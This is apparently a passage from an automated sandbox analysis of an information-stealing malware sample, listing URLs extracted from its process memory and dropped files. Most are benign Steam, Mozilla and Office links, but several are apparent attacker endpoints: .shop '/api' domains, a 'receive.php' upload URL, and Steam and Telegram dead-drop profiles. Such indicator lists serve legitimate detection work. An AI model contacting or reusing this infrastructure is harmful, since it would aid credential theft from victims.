                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                                Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drawzhotdog.shop:443/api:
                                Source: IDHIEB.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                Source: IDHIEB.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                Source: IDHIEB.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fragnantbui.shop/
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fragnantbui.shop:443/api
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ghostreedmnu.shop:443/api
                                Source: AFHDGDGIID.exe, 0000000C.00000002.2653231961.0000000002E00000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/lontivero/Open.Nat/issuesOAlso
                                Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hansgborn.eu
                                Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hansgborn.eu/receive.php
                                Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hansgborn.eu/receive.phpd
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://help.steampowered.com/en/
                                Source: CBAKJE.2.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: https://mozilla.org0/
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offensivedzvju.shop:443/api
                                Source: RDPWInst.exe, 00000013.00000000.2436607215.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.drString found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reinforcenh.shop/.itb
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reinforcenh.shop/apiO
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                                Source: 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/I
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/L
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/discussions/
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                                Source: 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/market/
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000D5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                                Source: file.exe, 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2452955008.00000000007CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                                Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869.
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
                                Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869G
                                Source: file.exe, 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
                                Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/s
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/workshop/
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stogeneratmns.shop/
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stogeneratmns.shop/api1
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stogeneratmns.shop/c
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stogeneratmns.shop:443/api
                                Source: 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/
                                Source: 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/about/
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/explore/
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/legal/
                                Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/mobile
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/news/
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/points/shop/
                                Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privac
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                                Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/stats/
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                                Source: EBFHJE.2.drString found in binary or memory: https://support.mozilla.org
                                Source: EBFHJE.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                Source: EBFHJE.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                                Source: RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2470601891.000000001937D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000DE1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2828108079.000000001984D000.00000004.00000020.00020000.00000000.sdmp, DAAFII.11.dr, GIEHJK.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                                Source: DAAFII.11.dr, GIEHJK.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                                Source: RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                                Source: RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2470601891.000000001937D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000DE1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2828108079.000000001984D000.00000004.00000020.00020000.00000000.sdmp, DAAFII.11.dr, GIEHJK.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                                Source: DAAFII.11.dr, GIEHJK.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                                Source: RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                                Source: file.exe, 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5ed
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vozmeatillu.shop:443/api
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wallkedsleeoi.shop/api
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
                                Source: IDHIEB.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                                Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.drString found in binary or memory: https://www.entrust.net/rpa0
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                                Source: IDHIEB.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                                Source: EBFHJE.2.drString found in binary or memory: https://www.mozilla.org
                                Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2470601891.000000001937D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                                Source: RegAsm.exe, 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                                Source: EBFHJE.2.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                                Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2470601891.000000001937D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                                Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/KKFHIDAAKF
                                Source: EBFHJE.2.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                                Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2470601891.000000001937D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                                Source: EBFHJE.2.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                                Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                                Source: EBFHJE.2.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2470601891.000000001937D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                                Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                                Source: EBFHJE.2.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
